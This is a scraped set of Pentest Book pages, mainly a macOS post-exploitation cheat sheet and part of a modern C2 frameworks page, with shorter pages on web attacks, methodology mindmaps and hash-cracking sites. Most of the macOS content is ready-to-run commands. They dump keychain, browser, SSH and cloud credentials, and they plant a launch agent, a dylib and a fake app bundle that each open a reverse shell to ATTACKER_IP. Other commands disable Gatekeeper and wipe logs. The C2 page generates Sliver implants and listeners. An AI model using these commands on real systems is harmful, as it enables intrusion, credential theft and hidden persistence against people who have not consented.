![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-M7HxAhMiFJpFKkmtB6g%252F-M7HxSJCq_3of6-TD9oZ%252Fassessment-mindset.png%3Falt%3Dmedia%26token%3D80ea6210-98c3-4c60-be17-fb4b32243e9b&width=768&dpr=3&quality=100&sign=c0e9b225&sv=2) [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Finventory.raw.pm%2Fimg%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=296d6d12&sv=2)Rawsec's CyberSecurity Inventoryinventory.raw.pm](https://inventory.raw.pm/tools.html) [PreviousExploiting](https://www.pentest-book.com/others/exploiting) [NextRT/EDR](https://www.pentest-book.com/others/rt-edr) Last updated 5 years ago Was this helpful? Was this helpful? --- # Web Attacks | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/web.md) . > **Skill Level**: Beginner to Advanced **Prerequisites**: HTTP basics, web architecture **Check out in the left submenu what common attack you want review** ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-M92gvt7GZ7vaA44ecsQ%252F-M92pwKmnNGTNqUWA0Fd%252Fy7ipicwvp5d41%255B1%255D.png%3Falt%3Dmedia%26token%3D155127c6-f54c-464d-9b78-ed90f7070e03&width=768&dpr=3&quality=100&sign=bc65dabb&sv=2) [PreviousPorts](https://www.pentest-book.com/enumeration/ports) [NextGeneral Info](https://www.pentest-book.com/enumeration/web/general-info) Last updated 5 months ago Was this helpful? Was this helpful? --- # macOS | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/post-exploitation/macos.md) . > **Skill Level**: Intermediate to Advanced **Prerequisites**: Unix basics, macOS architecture [](https://www.pentest-book.com/post-exploitation/macos#initial-reconnaissance) Initial Reconnaissance ----------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/post-exploitation/macos#system-information) System Information Copy # System info sw_vers system_profiler SPSoftwareDataType uname -a sysctl -a | grep -E "kern.version|hw.model" # Hardware info system_profiler SPHardwareDataType ioreg -l | grep -i "product-name" # Disk info diskutil list df -h # Network info ifconfig netstat -rn networksetup -listallhardwareports # Current user whoami id groups # Logged in users who w last # Running processes ps aux launchctl list ### [](https://www.pentest-book.com/post-exploitation/macos#security-configuration) Security Configuration [](https://www.pentest-book.com/post-exploitation/macos#credential-harvesting) Credential Harvesting --------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/post-exploitation/macos#keychain-access) Keychain Access ### [](https://www.pentest-book.com/post-exploitation/macos#browser-credentials) Browser Credentials ### [](https://www.pentest-book.com/post-exploitation/macos#ssh-keys) SSH Keys ### [](https://www.pentest-book.com/post-exploitation/macos#environment-variables) Environment Variables [](https://www.pentest-book.com/post-exploitation/macos#privilege-escalation) Privilege Escalation ------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/post-exploitation/macos#sudo-exploitation) Sudo Exploitation ### [](https://www.pentest-book.com/post-exploitation/macos#suid-binaries) SUID Binaries ### [](https://www.pentest-book.com/post-exploitation/macos#launch-agent-daemon-hijacking) Launch Agent/Daemon Hijacking ### [](https://www.pentest-book.com/post-exploitation/macos#dylib-hijacking) Dylib Hijacking ### [](https://www.pentest-book.com/post-exploitation/macos#tcc-bypass) TCC Bypass [](https://www.pentest-book.com/post-exploitation/macos#persistence) Persistence ------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/post-exploitation/macos#login-items) Login Items ### [](https://www.pentest-book.com/post-exploitation/macos#cron-jobs) Cron Jobs ### [](https://www.pentest-book.com/post-exploitation/macos#periodic-scripts) Periodic Scripts ### [](https://www.pentest-book.com/post-exploitation/macos#login-logout-hooks) Login/Logout Hooks ### [](https://www.pentest-book.com/post-exploitation/macos#folder-actions) Folder Actions ### [](https://www.pentest-book.com/post-exploitation/macos#application-bundles) Application Bundles [](https://www.pentest-book.com/post-exploitation/macos#lateral-movement) Lateral Movement ----------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/post-exploitation/macos#remote-apple-events) Remote Apple Events ### [](https://www.pentest-book.com/post-exploitation/macos#ard-apple-remote-desktop) ARD (Apple Remote Desktop) ### [](https://www.pentest-book.com/post-exploitation/macos#ssh) SSH [](https://www.pentest-book.com/post-exploitation/macos#evasion) Evasion ----------------------------------------------------------------------------- ### [](https://www.pentest-book.com/post-exploitation/macos#disable-security-features) Disable Security Features ### [](https://www.pentest-book.com/post-exploitation/macos#hide-from-activity-monitor) Hide from Activity Monitor ### [](https://www.pentest-book.com/post-exploitation/macos#log-evasion) Log Evasion [](https://www.pentest-book.com/post-exploitation/macos#tools) Tools ------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/macos#checklist) Checklist --------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/macos#related-topics) Related Topics ------------------------------------------------------------------------------------------- * [Linux Post-Exploitation](https://www.pentest-book.com/post-exploitation/linux) - Unix-like techniques * [Credential Harvesting](https://github.com/six2dez/pentest-book/blob/master/post-exploitation/windows/credential-access/README.md) - Windows comparison * [Persistence](https://github.com/six2dez/pentest-book/blob/master/post-exploitation/windows/persistence/README.md) - Cross-platform techniques [PreviousLinux](https://www.pentest-book.com/post-exploitation/linux) [NextPivoting](https://www.pentest-book.com/post-exploitation/pivoting) Last updated 5 months ago Was this helpful? * [Initial Reconnaissance](https://www.pentest-book.com/post-exploitation/macos#initial-reconnaissance) * [System Information](https://www.pentest-book.com/post-exploitation/macos#system-information) * [Security Configuration](https://www.pentest-book.com/post-exploitation/macos#security-configuration) * [Credential Harvesting](https://www.pentest-book.com/post-exploitation/macos#credential-harvesting) * [Keychain Access](https://www.pentest-book.com/post-exploitation/macos#keychain-access) * [Browser Credentials](https://www.pentest-book.com/post-exploitation/macos#browser-credentials) * [SSH Keys](https://www.pentest-book.com/post-exploitation/macos#ssh-keys) * [Environment Variables](https://www.pentest-book.com/post-exploitation/macos#environment-variables) * [Privilege Escalation](https://www.pentest-book.com/post-exploitation/macos#privilege-escalation) * [Sudo Exploitation](https://www.pentest-book.com/post-exploitation/macos#sudo-exploitation) * [SUID Binaries](https://www.pentest-book.com/post-exploitation/macos#suid-binaries) * [Launch Agent/Daemon Hijacking](https://www.pentest-book.com/post-exploitation/macos#launch-agent-daemon-hijacking) * [Dylib Hijacking](https://www.pentest-book.com/post-exploitation/macos#dylib-hijacking) * [TCC Bypass](https://www.pentest-book.com/post-exploitation/macos#tcc-bypass) * [Persistence](https://www.pentest-book.com/post-exploitation/macos#persistence) * [Login Items](https://www.pentest-book.com/post-exploitation/macos#login-items) * [Cron Jobs](https://www.pentest-book.com/post-exploitation/macos#cron-jobs) * [Periodic Scripts](https://www.pentest-book.com/post-exploitation/macos#periodic-scripts) * [Login/Logout Hooks](https://www.pentest-book.com/post-exploitation/macos#login-logout-hooks) * [Folder Actions](https://www.pentest-book.com/post-exploitation/macos#folder-actions) * [Application Bundles](https://www.pentest-book.com/post-exploitation/macos#application-bundles) * [Lateral Movement](https://www.pentest-book.com/post-exploitation/macos#lateral-movement) * [Remote Apple Events](https://www.pentest-book.com/post-exploitation/macos#remote-apple-events) * [ARD (Apple Remote Desktop)](https://www.pentest-book.com/post-exploitation/macos#ard-apple-remote-desktop) * [SSH](https://www.pentest-book.com/post-exploitation/macos#ssh) * [Evasion](https://www.pentest-book.com/post-exploitation/macos#evasion) * [Disable Security Features](https://www.pentest-book.com/post-exploitation/macos#disable-security-features) * [Hide from Activity Monitor](https://www.pentest-book.com/post-exploitation/macos#hide-from-activity-monitor) * [Log Evasion](https://www.pentest-book.com/post-exploitation/macos#log-evasion) * [Tools](https://www.pentest-book.com/post-exploitation/macos#tools) * [Checklist](https://www.pentest-book.com/post-exploitation/macos#checklist) * [Related Topics](https://www.pentest-book.com/post-exploitation/macos#related-topics) Was this helpful? Copy # Check SIP status (System Integrity Protection) csrutil status # Check Gatekeeper status spctl --status # Check FileVault status (disk encryption) fdesetup status # Firewall status /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate # XProtect version (built-in malware detection) system_profiler SPInstallHistoryDataType | grep -A 5 "XProtect" # TCC database (privacy permissions) sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db "SELECT * FROM access" # Check if MDM enrolled profiles -P # Privacy preferences tccutil reset All # Requires admin Copy # List keychains security list-keychains # Dump keychain items (requires password or GUI prompt) security dump-keychain -d login.keychain-db # Find specific passwords security find-generic-password -s "service_name" -w security find-internet-password -s "server_name" -w # Export keychain (encrypted) security export -k login.keychain-db -o keychain_backup.pem # Keychain locations ~/Library/Keychains/login.keychain-db /Library/Keychains/System.keychain Copy # Chrome cookies (encrypted with user keychain) sqlite3 ~/Library/Application\ Support/Google/Chrome/Default/Cookies "SELECT * FROM cookies" # Chrome passwords (encrypted) sqlite3 ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data "SELECT origin_url, username_value FROM logins" # Safari cookies sqlite3 ~/Library/Cookies/Cookies.binarycookies # Firefox credentials ~/Library/Application\ Support/Firefox/Profiles/*/logins.json # Decrypt Chrome passwords (chainbreaker) # https://github.com/n0fate/chainbreaker python2 chainbreaker.py --dump-all ~/Library/Keychains/login.keychain-db Copy # SSH directory ls -la ~/.ssh/ cat ~/.ssh/id_rsa cat ~/.ssh/known_hosts cat ~/.ssh/config # Authorized keys cat ~/.ssh/authorized_keys # SSH agent ssh-add -l Copy # Check for secrets in env env | grep -iE "password|secret|key|token|api" # Bash history cat ~/.bash_history cat ~/.zsh_history # Application preferences defaults read # AWS credentials cat ~/.aws/credentials cat ~/.aws/config # Kubernetes credentials cat ~/.kube/config Copy # Check sudo permissions sudo -l # Sudo without password (check for NOPASSWD) cat /etc/sudoers 2>/dev/null # CVE-2021-3156 (Sudo heap overflow) - macOS 11.2 and earlier sudoedit -s '\' `perl -e 'print "A" x 65536'` # Sudo token reuse (if within timeout) sudo -n true 2>/dev/null && echo "Sudo cached" Copy # Find SUID binaries find / -perm -4000 -type f 2>/dev/null # Common exploitable SUID /usr/bin/newgrp /usr/bin/chsh # Check for custom SUID apps find /Applications -perm -4000 -type f 2>/dev/null Copy # User launch agents (writable) ls -la ~/Library/LaunchAgents/ # System launch agents ls -la /Library/LaunchAgents/ # System launch daemons ls -la /Library/LaunchDaemons/ # Apple launch daemons ls -la /System/Library/LaunchDaemons/ # Find writable plist files find /Library/LaunchAgents /Library/LaunchDaemons -writable 2>/dev/null # Hijack launch agent cat > ~/Library/LaunchAgents/com.malicious.agent.plist << EOF Label com.malicious.agent ProgramArguments /bin/bash -c bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 RunAtLoad EOF launchctl load ~/Library/LaunchAgents/com.malicious.agent.plist Copy # Find applications with weak dylib references # Use otool to check dependencies otool -L /Applications/Target.app/Contents/MacOS/Target # Find missing dylibs for app in /Applications/*.app; do otool -L "$app/Contents/MacOS/"* 2>/dev/null | grep "not found" done # Create malicious dylib # compile_dylib.c: cat > /tmp/evil.c << EOF #include __attribute__((constructor)) void init() { system("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"); } EOF # Compile gcc -dynamiclib -o /path/to/missing.dylib /tmp/evil.c # DYLD_INSERT_LIBRARIES (if SIP disabled) DYLD_INSERT_LIBRARIES=/path/to/evil.dylib /Applications/Target.app/Contents/MacOS/Target Copy # TCC (Transparency, Consent, and Control) bypass techniques # Check TCC database sqlite3 "/Library/Application Support/com.apple.TCC/TCC.db" "SELECT * FROM access" # Inherited permissions (if parent has FDA) # Terminal.app has Full Disk Access → scripts run from Terminal inherit it # Mount external volume (bypasses some TCC on older versions) hdiutil attach disk_image.dmg # CVE-2023-32364 - TCC bypass via symlink # Specific to affected versions # Electron app TCC inheritance # If Electron app has permissions, JavaScript can use them Copy # Add login item (GUI persistence) osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/app", hidden:true}' # List login items osascript -e 'tell application "System Events" to get the name of every login item' # Via defaults defaults write com.apple.loginitems Session-1 -array-add 'NameMalwarePath/path/to/malware' Copy # Create cron job echo "* * * * * /path/to/payload" | crontab - # List cron jobs crontab -l cat /etc/crontab ls -la /usr/lib/cron/tabs/ Copy # Periodic scripts run daily/weekly/monthly ls -la /etc/periodic/daily/ ls -la /etc/periodic/weekly/ ls -la /etc/periodic/monthly/ # Add malicious periodic script echo '#!/bin/bash /path/to/payload' > /etc/periodic/daily/666.malware chmod +x /etc/periodic/daily/666.malware Copy # Login hook (runs as root) sudo defaults write com.apple.loginwindow LoginHook /path/to/script # Logout hook sudo defaults write com.apple.loginwindow LogoutHook /path/to/script Copy # Folder action script (runs when folder contents change) cat > ~/Library/Scripts/Folder\ Action\ Scripts/malicious.scpt << EOF on adding folder items to theFolder after receiving theItems do shell script "/path/to/payload" end adding folder items to EOF # Attach to folder osascript -e 'tell application "System Events" to set folder actions enabled to true' osascript -e 'tell application "System Events" to make new folder action with properties {name:"target_folder", path:"/path/to/folder"}' Copy # Create malicious .app bundle mkdir -p /tmp/Malware.app/Contents/MacOS cat > /tmp/Malware.app/Contents/MacOS/Malware << EOF #!/bin/bash bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 EOF chmod +x /tmp/Malware.app/Contents/MacOS/Malware cat > /tmp/Malware.app/Contents/Info.plist << EOF CFBundleExecutable Malware CFBundleIdentifier com.legitimate.app LSUIElement EOF Copy # Check if enabled systemsetup -getremoteappleevents # Enable (requires admin) sudo systemsetup -setremoteappleevents on # Connect via Apple Events osascript -e 'tell application "Finder" of machine "eppc://user:pass@target" to open home' Copy # Check ARD status sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -users admin -privs -all -restart -agent # Connect with VNC viewer # Port 5900 # Scan for ARD nmap -p 5900,3283 target_network/24 Copy # Enable SSH (Remote Login) sudo systemsetup -setremotelogin on # SSH with key ssh-copy-id user@target ssh user@target # Port forward ssh -L 8080:internal:80 user@target Copy # Disable Gatekeeper (requires admin/SIP disabled) sudo spctl --master-disable # Disable XProtect updates sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate CriticalUpdateInstall -bool false # Clear quarantine attribute xattr -d com.apple.quarantine /path/to/file # Sign malicious binary with ad-hoc signature codesign -s - /path/to/malware Copy # Rename process exec -a "Google Chrome Helper" /path/to/malware # Run in background nohup /path/to/malware &>/dev/null & disown Copy # Clear bash history history -c rm ~/.bash_history ~/.zsh_history # Disable history unset HISTFILE export HISTSIZE=0 # Clear system logs (requires root) sudo rm -rf /var/log/* sudo rm -rf /Library/Logs/* # Clear unified log sudo log erase --all Copy # Empire (macOS agents) # https://github.com/BC-SECURITY/Empire # Mythic (cross-platform C2) # https://github.com/its-a-feature/Mythic # Apfell agent for macOS # Sliver (cross-platform C2) # https://github.com/BishopFox/sliver generate --mtls ATTACKER_IP --os darwin --arch amd64 # Poseidon (macOS agent for Mythic) # https://github.com/MythicAgents/poseidon # SwiftBelt (macOS security checks) # https://github.com/cedowens/SwiftBelt # MacHound (BloodHound for macOS) # https://github.com/hotnops/MacHound Copy ## Initial Access - [ ] System information gathered - [ ] Security features enumerated - [ ] SIP/Gatekeeper status checked ## Credential Harvesting - [ ] Keychain dumped - [ ] Browser credentials extracted - [ ] SSH keys collected - [ ] Environment variables checked ## Privilege Escalation - [ ] Sudo permissions checked - [ ] SUID binaries enumerated - [ ] Launch agent/daemon hijacking tested - [ ] Dylib hijacking tested - [ ] TCC bypass attempted ## Persistence - [ ] Launch agent installed - [ ] Login item added - [ ] Cron job created - [ ] Login hook set ## Lateral Movement - [ ] SSH access tested - [ ] ARD availability checked - [ ] Remote Apple Events tested ## Evasion - [ ] Logs cleared - [ ] Quarantine attribute removed - [ ] Process hidden --- # Master assessment mindmaps | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/master-assessment-mindmap.md) . [](https://www.pentest-book.com/others/master-assessment-mindmap#web-application-pentesting-mindmap) Web Application Pentesting Mindmap -------------------------------------------------------------------------------------------------------------------------------------------- Key areas to assess during web application security testing: ### [](https://www.pentest-book.com/others/master-assessment-mindmap#reconnaissance) Reconnaissance * Subdomain enumeration * Technology fingerprinting * Hidden content discovery * API endpoint mapping ### [](https://www.pentest-book.com/others/master-assessment-mindmap#authentication-testing) Authentication Testing * Brute force protection * Password policies * Session management * Multi-factor authentication bypass * Account lockout mechanisms ### [](https://www.pentest-book.com/others/master-assessment-mindmap#authorization-testing) Authorization Testing * Horizontal privilege escalation (IDOR) * Vertical privilege escalation * Function-level access control * Insecure direct object references ### [](https://www.pentest-book.com/others/master-assessment-mindmap#input-validation) Input Validation * SQL Injection (all types) * XSS (Reflected, Stored, DOM) * Command Injection * SSRF / CSRF * XXE Injection * Template Injection (SSTI) ### [](https://www.pentest-book.com/others/master-assessment-mindmap#business-logic) Business Logic * Workflow bypass * Price manipulation * Quantity tampering * Feature abuse ### [](https://www.pentest-book.com/others/master-assessment-mindmap#infrastructure) Infrastructure * Server misconfigurations * Default credentials * Exposed admin panels * Information disclosure ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MG33U1tPKkztqqfsks0%252F-MG33dIgvN3YUZUMnKCs%252Fimage.png%3Falt%3Dmedia%26token%3Db9e7d007-78ff-4f6f-9b9b-03c39dd5cffa&width=768&dpr=3&quality=100&sign=7c9978be&sv=2) [](https://www.pentest-book.com/others/master-assessment-mindmap#bug-bounty-methodology) Bug Bounty Methodology -------------------------------------------------------------------------------------------------------------------- ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fblog.it-securityguard.com%2Fpbbt.png&width=768&dpr=3&quality=100&sign=38b1e619&sv=2) [](https://www.pentest-book.com/others/master-assessment-mindmap#comprehensive-pentest-methodology) Comprehensive Pentest Methodology ------------------------------------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/others/master-assessment-mindmap#phase-1-information-gathering) Phase 1: Information Gathering 1. Passive reconnaissance (OSINT) 2. Active scanning and enumeration 3. Vulnerability identification ### [](https://www.pentest-book.com/others/master-assessment-mindmap#phase-2-exploitation) Phase 2: Exploitation 1. Vulnerability validation 2. Exploit development/selection 3. Initial access ### [](https://www.pentest-book.com/others/master-assessment-mindmap#phase-3-post-exploitation) Phase 3: Post-Exploitation 1. Privilege escalation 2. Persistence 3. Lateral movement 4. Data exfiltration ### [](https://www.pentest-book.com/others/master-assessment-mindmap#phase-4-reporting) Phase 4: Reporting 1. Finding documentation 2. Risk assessment 3. Remediation recommendations ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MB8gbhAoFg9IFNKBZYU%252F-MB8iKf1-S8141P3waGS%252FMethodology%255B1%255D.png%3Falt%3Dmedia%26token%3D20b83dc7-d8b2-4a09-b276-09042a7726e1&width=768&dpr=3&quality=100&sign=6612593f&sv=2) [](https://www.pentest-book.com/others/master-assessment-mindmap#additional-resources) Additional Resources ---------------------------------------------------------------------------------------------------------------- * [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/) * [PortSwigger Web Security Academy](https://portswigger.net/web-security) * [HackTricks](https://book.hacktricks.xyz/) * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) [PreviousRandom](https://www.pentest-book.com/others/dictionaries) [NextBugBounty](https://www.pentest-book.com/others/bugbounty) Last updated 5 months ago Was this helpful? * [Web Application Pentesting Mindmap](https://www.pentest-book.com/others/master-assessment-mindmap#web-application-pentesting-mindmap) * [Reconnaissance](https://www.pentest-book.com/others/master-assessment-mindmap#reconnaissance) * [Authentication Testing](https://www.pentest-book.com/others/master-assessment-mindmap#authentication-testing) * [Authorization Testing](https://www.pentest-book.com/others/master-assessment-mindmap#authorization-testing) * [Input Validation](https://www.pentest-book.com/others/master-assessment-mindmap#input-validation) * [Business Logic](https://www.pentest-book.com/others/master-assessment-mindmap#business-logic) * [Infrastructure](https://www.pentest-book.com/others/master-assessment-mindmap#infrastructure) * [Bug Bounty Methodology](https://www.pentest-book.com/others/master-assessment-mindmap#bug-bounty-methodology) * [Comprehensive Pentest Methodology](https://www.pentest-book.com/others/master-assessment-mindmap#comprehensive-pentest-methodology) * [Phase 1: Information Gathering](https://www.pentest-book.com/others/master-assessment-mindmap#phase-1-information-gathering) * [Phase 2: Exploitation](https://www.pentest-book.com/others/master-assessment-mindmap#phase-2-exploitation) * [Phase 3: Post-Exploitation](https://www.pentest-book.com/others/master-assessment-mindmap#phase-3-post-exploitation) * [Phase 4: Reporting](https://www.pentest-book.com/others/master-assessment-mindmap#phase-4-reporting) * [Additional Resources](https://www.pentest-book.com/others/master-assessment-mindmap#additional-resources) Was this helpful? --- # Online hashes cracked | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/web/online-hashes-cracked.md) . Copy https://www.cmd5.org/ http://hashes.org https://www.onlinehashcrack.com/ https://gpuhash.me/ https://crackstation.net/ https://crack.sh/ https://hash.help/ https://passwordrecovery.io/ http://cracker.offensive-security.com/ https://md5decrypt.net/en/Sha256/ https://weakpass.com/wordlists https://hashes.com/en/decrypt/hash [PreviousBruteforcing](https://www.pentest-book.com/enumeration/web/bruteforcing) [NextCrawl/Fuzz](https://www.pentest-book.com/enumeration/web/crawl-fuzz) Last updated 4 years ago Was this helpful? Was this helpful? --- # Modern C2 Frameworks | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/exploitation/modern-c2.md) . Command and Control frameworks for red team operations (2024-2025). > **Skill Level**: Advanced **Prerequisites**: Network protocols, evasion techniques, operational security [](https://www.pentest-book.com/exploitation/modern-c2#framework-comparison) Framework Comparison ------------------------------------------------------------------------------------------------------ Framework Language License Evasion Comms Sliver Go Open Source Good mTLS, HTTP(S), DNS, WG Havoc C/C++ Open Source Excellent HTTP(S), SMB Mythic Python/Go Open Source Good Multiple agents Brute Ratel C/C++ Commercial Excellent HTTP(S), DNS, SMB Nighthawk C++ Commercial Excellent HTTP(S), DNS Cobalt Strike Java Commercial Good HTTP(S), DNS, SMB [](https://www.pentest-book.com/exploitation/modern-c2#sliver) Sliver -------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/modern-c2#installation) Installation Copy # Download latest release curl https://sliver.sh/install | sudo bash # Or build from source git clone https://github.com/BishopFox/sliver.git cd sliver make # Start server ./sliver-server ### [](https://www.pentest-book.com/exploitation/modern-c2#implant-generation) Implant Generation ### [](https://www.pentest-book.com/exploitation/modern-c2#listeners) Listeners ### [](https://www.pentest-book.com/exploitation/modern-c2#operations) Operations ### [](https://www.pentest-book.com/exploitation/modern-c2#evasion-features) Evasion Features [](https://www.pentest-book.com/exploitation/modern-c2#havoc) Havoc ------------------------------------------------------------------------ ### [](https://www.pentest-book.com/exploitation/modern-c2#installation-1) Installation ### [](https://www.pentest-book.com/exploitation/modern-c2#demon-generation) Demon Generation ### [](https://www.pentest-book.com/exploitation/modern-c2#features) Features ### [](https://www.pentest-book.com/exploitation/modern-c2#operations-1) Operations [](https://www.pentest-book.com/exploitation/modern-c2#mythic) Mythic -------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/modern-c2#installation-2) Installation ### [](https://www.pentest-book.com/exploitation/modern-c2#available-agents) Available Agents ### [](https://www.pentest-book.com/exploitation/modern-c2#payload-generation) Payload Generation ### [](https://www.pentest-book.com/exploitation/modern-c2#operations-2) Operations [](https://www.pentest-book.com/exploitation/modern-c2#brute-ratel-c4-commercial) Brute Ratel C4 (Commercial) ------------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/exploitation/modern-c2#overview) Overview ### [](https://www.pentest-book.com/exploitation/modern-c2#key-features) Key Features ### [](https://www.pentest-book.com/exploitation/modern-c2#operational-concepts) Operational Concepts [](https://www.pentest-book.com/exploitation/modern-c2#nighthawk-commercial) Nighthawk (Commercial) -------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/modern-c2#overview-1) Overview ### [](https://www.pentest-book.com/exploitation/modern-c2#features-1) Features [](https://www.pentest-book.com/exploitation/modern-c2#evasion-techniques) Evasion Techniques -------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/modern-c2#common-to-modern-c2s) Common to Modern C2s ### [](https://www.pentest-book.com/exploitation/modern-c2#sleep-obfuscation-example) Sleep Obfuscation Example [](https://www.pentest-book.com/exploitation/modern-c2#c2-infrastructure) C2 Infrastructure ------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/exploitation/modern-c2#redirectors) Redirectors ### [](https://www.pentest-book.com/exploitation/modern-c2#domain-fronting) Domain Fronting ### [](https://www.pentest-book.com/exploitation/modern-c2#malleable-profiles) Malleable Profiles [](https://www.pentest-book.com/exploitation/modern-c2#related-topics) Related Topics ------------------------------------------------------------------------------------------ * [RT/EDR Evasion](https://www.pentest-book.com/others/rt-edr) - Evasion techniques * [Windows Post-Exploitation](https://www.pentest-book.com/post-exploitation/windows) - Windows operations * [Reverse Shells](https://www.pentest-book.com/exploitation/reverse-shells) - Initial access [PreviousLinux Kernel Exploits](https://www.pentest-book.com/exploitation/linux-kernel-2024) [NextLinux](https://www.pentest-book.com/post-exploitation/linux) Last updated 5 months ago Was this helpful? * [Framework Comparison](https://www.pentest-book.com/exploitation/modern-c2#framework-comparison) * [Sliver](https://www.pentest-book.com/exploitation/modern-c2#sliver) * [Installation](https://www.pentest-book.com/exploitation/modern-c2#installation) * [Implant Generation](https://www.pentest-book.com/exploitation/modern-c2#implant-generation) * [Listeners](https://www.pentest-book.com/exploitation/modern-c2#listeners) * [Operations](https://www.pentest-book.com/exploitation/modern-c2#operations) * [Evasion Features](https://www.pentest-book.com/exploitation/modern-c2#evasion-features) * [Havoc](https://www.pentest-book.com/exploitation/modern-c2#havoc) * [Installation](https://www.pentest-book.com/exploitation/modern-c2#installation-1) * [Demon Generation](https://www.pentest-book.com/exploitation/modern-c2#demon-generation) * [Features](https://www.pentest-book.com/exploitation/modern-c2#features) * [Operations](https://www.pentest-book.com/exploitation/modern-c2#operations-1) * [Mythic](https://www.pentest-book.com/exploitation/modern-c2#mythic) * [Installation](https://www.pentest-book.com/exploitation/modern-c2#installation-2) * [Available Agents](https://www.pentest-book.com/exploitation/modern-c2#available-agents) * [Payload Generation](https://www.pentest-book.com/exploitation/modern-c2#payload-generation) * [Operations](https://www.pentest-book.com/exploitation/modern-c2#operations-2) * [Brute Ratel C4 (Commercial)](https://www.pentest-book.com/exploitation/modern-c2#brute-ratel-c4-commercial) * [Overview](https://www.pentest-book.com/exploitation/modern-c2#overview) * [Key Features](https://www.pentest-book.com/exploitation/modern-c2#key-features) * [Operational Concepts](https://www.pentest-book.com/exploitation/modern-c2#operational-concepts) * [Nighthawk (Commercial)](https://www.pentest-book.com/exploitation/modern-c2#nighthawk-commercial) * [Overview](https://www.pentest-book.com/exploitation/modern-c2#overview-1) * [Features](https://www.pentest-book.com/exploitation/modern-c2#features-1) * [Evasion Techniques](https://www.pentest-book.com/exploitation/modern-c2#evasion-techniques) * [Common to Modern C2s](https://www.pentest-book.com/exploitation/modern-c2#common-to-modern-c2s) * [Sleep Obfuscation Example](https://www.pentest-book.com/exploitation/modern-c2#sleep-obfuscation-example) * [C2 Infrastructure](https://www.pentest-book.com/exploitation/modern-c2#c2-infrastructure) * [Redirectors](https://www.pentest-book.com/exploitation/modern-c2#redirectors) * [Domain Fronting](https://www.pentest-book.com/exploitation/modern-c2#domain-fronting) * [Malleable Profiles](https://www.pentest-book.com/exploitation/modern-c2#malleable-profiles) * [Related Topics](https://www.pentest-book.com/exploitation/modern-c2#related-topics) Was this helpful? Copy # Generate beacon (recommended - async) sliver > generate beacon --http https://teamserver.com --save /tmp/beacon.exe # Generate session (interactive) sliver > generate --mtls teamserver.com --save /tmp/session.exe # Linux implant sliver > generate beacon --http https://teamserver.com --os linux --arch amd64 # macOS sliver > generate beacon --http https://teamserver.com --os darwin --arch amd64 # Staged payload (smaller) sliver > generate stager --lhost teamserver.com --lport 8443 --protocol http # Shellcode output sliver > generate beacon --http https://teamserver.com --format shellcode Copy # HTTPS listener sliver > https --lhost 0.0.0.0 --lport 443 --domain legitimate.com # mTLS listener sliver > mtls --lhost 0.0.0.0 --lport 8888 # DNS listener sliver > dns --domains evil.com --lport 53 # WireGuard listener sliver > wg --lport 51820 Copy # List sessions/beacons sliver > sessions sliver > beacons # Interact with beacon sliver > use # Execute commands sliver (BEACON) > shell sliver (BEACON) > execute -o whoami # File operations sliver (BEACON) > download C:\\Users\\admin\\Desktop\\secrets.txt sliver (BEACON) > upload /tmp/tool.exe C:\\Windows\\Temp\\tool.exe # Process operations sliver (BEACON) > ps sliver (BEACON) > migrate # Pivoting sliver (BEACON) > pivots tcp --bind 0.0.0.0:1234 # Built-in tools sliver (BEACON) > seatbelt sliver (BEACON) > sharpup Copy # Obfuscation during 